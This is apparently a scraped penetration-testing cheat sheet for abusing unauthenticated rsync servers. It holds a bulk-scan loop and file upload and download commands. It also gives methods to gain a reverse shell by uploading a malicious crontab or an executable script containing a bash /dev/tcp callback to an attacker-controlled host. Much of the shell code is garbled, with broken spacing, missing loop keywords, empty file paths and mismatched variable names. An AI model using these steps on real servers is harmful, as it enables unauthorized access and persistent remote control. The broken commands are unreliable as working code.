Copy # RHOST=remoteHost; RPORT=873
rsync rsyns:// $RHOST : $RPORT
# Bulk testing
# RHOST_LIST=hosts.txt
run () {
while IFS = read -r LINE
if [[ "$LINE" == * ":" * ]]; then
RHOST = ${LINE %%:* }
RPORT = ${LINE #*: }
RPORT = 873
if [[ -n "$( sshpass -p '' rsync rsync:// $RHOST : $RPORT 2> /dev/null )" ]]; then
echo "[SUCCESS] rsync://$RHOST:$RPORT"
done < "$RHOST_LIST"
run | awk -F '//' '{print $2}'
Method 1: Regular upload files
Copy # RHOST=remoteHost; RPORT=873
rsync -av /path/to/localFile rsync:// $RHOST : $RPORT /path/to/remoteFile
Method 2: Upload crontab to reverse shell
Copy # RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Method 1: Modify the `crontab` of the remote server
# Step 1: Download the `crontab` of the remote server
# Step 2: Added reverse shell task
# Step 3: Upload the evil 'crontab'
# Method 2: Added the `crontab` of the remote server
# Step 1: Create evil `crontab`
# Step 2: Upload the evil 'crontab'
Method 3: Upload the executable reverse shell file and add crontab to execute
Copy # RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Step 1: Create a reverse shell script and add executable permissions
echo "#\!/bin/bash\n/bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" > /tmp/
chmod +x /tmp/
# Step 2: Upload reverse shell script
rsync -av /tmp/ rsync:// $RHOST : $RPORT /src/tmp/
# Step 3: Download and modify the target server crontab
# Step 4: Upload evil crontab
Copy # RHOST=remoteHost; RPORT=873
rsync -av rsync:// $RHOST : $RPORT /path/to/remoteFile /path/to/localFile